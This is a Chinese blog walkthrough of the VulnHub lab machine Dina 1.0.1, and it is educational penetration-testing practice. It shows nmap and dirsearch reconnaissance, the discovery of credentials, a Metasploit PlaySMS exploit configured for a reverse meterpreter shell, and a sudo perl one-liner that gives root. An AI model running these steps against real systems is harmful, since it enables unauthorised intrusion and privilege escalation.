Dina-1-0-1靶机渗透测试

最新推荐文章于 2024-08-03 21:20:25 发布
最新推荐文章于 2024-08-03 21:20:25 发布
阅读量207 收藏 6
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140858231
版权

一、靶机下载地址

https://www.vulnhub.com/entry/dina-101,200/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:16:E8:03'

2、指纹识别

# 使用命令
whatweb 192.168.145.183

3、端口扫描

发现只开放了80端口

# 使用命令
nmap 192.168.145.183 -p- -sV

4、目录扫描

# 使用命令
dirsearch -u "http://192.168.145.183"

三、获取shell

1、访问靶机IP地址

2、访问robots.txt文件,发现了5个路径

3、逐一访问,发现/nothing不同

4、查看源代码,发现5个密码

5、拼接并访问/secure/目录,得到一个zip文件

6、将发现的zip文件下载下来,发现解压时需要密码

7、尝试之前发现的5个密码,发现freedom成功

8、 成功解压,发现文件是mp3文件,但文件已经损坏,无法播放

9、使用cat 命令查看backup-cred.mp3文件发现一项URL地址并且给出了账号为touhid

10、拼接获取到的url发现登录界面, 可以看到为Playsms框架

11、再次尝试之前发现的5个密码,发现密码为diana,登录成功

12、 使用kali中的searchsploit工具,查看下框架版本信息

# 使用命令
searchsploit playsms

13、将42044.txt文件导入到当前目录下

# 使用命令
cp /usr/share/exploitdb/exploits/php/webapps/42044.txt .

14、查看42044.txt文件中的内容, 按照文档说明,我们可以生成一个csv文件,抓包传参;文档中给出了上传的脚本和信息,可以在user-agent中执行命令;

# 使用命令
cat 42044.txt

15、 使用msf查看框架漏洞

# 使用命令
msfconsole

search playsms

16、使用编号为0的框架漏洞,并输入show options查看配置信息

# 使用命令
use 0 
show options

17、设置配置信息

# 使用命令
set password diana
set username touhid
set targeturi SecreTSMSgatwayLogin
set rhosts 192.168.145.183
set lhost 192.168.145.146
set lport 1234
run

18、 成功获得meterpreter,输入shell,成功获取到shell

四、提权

1、 使用sudo -l命令查看可提权文件,发现可以执行perl命令

# 使用命令
sudo -l

2、使用辅助网站,执行命令进行提权

# 辅助网站
https://gtfobins.github.io/

3、执行命令,成功提权

# 使用命令
sudo perl -e 'exec "/bin/sh";'

果冻*果冻*
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 825
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
【VulnHub靶机渗透】七:DC-4
野原新之助
04-29 389
靶机设定Web登录界面的弱口令漏洞,以及站点存在命令执行,和sudo的不安全配置问题。VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 441
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
靶机渗透测试Dina: 1.0.1)
@小张小张的博客
12-07 1597
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
Dina-1-0-1打靶渗透【附代码】(权限提升)
weixin_52487093的博客
08-01 610
Dina-1-0-1打靶渗透【附代码】(权限提升)
Dina靶机渗透
weixin_44769042的博客
10-10 499
挺有意思的一个靶机 目录 主机发现 端口扫描 目录扫描 去web端看看,开始渗透 反弹shell 方法1 方法2 提权 尝试1-失败 尝试2-脏牛提权-成功 主机发现 netdiscover -i eth0 -r 192.168.129.0/24 端口扫描 扫描端口的服务版本,服务器操作系统,中间件等信息 目录扫描 去web端看看,开始渗透 看了看页面也没啥有用信息 一个提交信息 只是爆出服务器中间件版本然后也不能操作什么 还有一个链.
kali渗透综合靶机(十三)--Dina 1.0靶机
WY92139010的博客
06-03 693
kali渗透综合靶机(十三)--Dina 1.0靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.181    三、端口服务识别 1. nmap -sV -T4 -O -p ,80 192.168.10.181 ...
vulnhub-1:Dina
qq_60384876的博客
02-20 959
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
【B2R】DINA1.0.1
qq_44339430的博客
03-24 495
【B2R】DINA:1.0.1 靶场地址:https://www.vulnhub.com/entry/dina-101,200/ 靶场信息 靶场描述 Description Back to the Top Welcome to Dina 1.0.1 ________ _________ \________\--------___ ___ ____----------/______
dina-mediaserver
06-25
================ DINA-WEB - 媒体服务器模块 Mediaserver 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml 文件中...
dina-mediaserver-demo
07-07
================ DINA-WEB : MediaServer-Demo MediaServer-Demo 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml...
6008080 g Z 1 dina0 Z-ZEICHNUNG.tif
02-05
6008080 g Z 1 dina0 Z-ZEICHNUNG.tif
Dina Translator-开源
07-03
Dina 是 Windows 的翻译器,可以在大多数应用程序中快速翻译文本,例如 Web 浏览器、游戏、Office 应用程序、Messenger 等。该软件随时使用“在线连接”。 因此,它是翻译的先决条件。 合法访问:软件免费版本未获得...
dina-2021:我为2021年Dina生日创作的拼图
04-08
【标题】"Dina-2021:我为2021年Dina生日创作的拼图"是一个特别的项目,旨在庆祝Dina的生日,通过编程技术为她创造了一个独特的体验。这个项目的核心是一个互动式的拼图游戏,可能使用了JavaScript作为主要的编程语言...
web安全之简要sql注入
weixin_73185660的博客
08-01 949
举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。如果是1=1,那么就是真且真,结果为真。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1625
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
构建网络安全的坚实基石:深入解析NIST与ISO 27001框架
最新发布
2401_85341950的博客
08-03 529
网络安全框架是一套指南和最佳实践,用于帮助组织评估、设计、实施和维护其网络安全策略。这些框架通常包括识别、保护、检测、响应和恢复五个核心功能。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 859
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值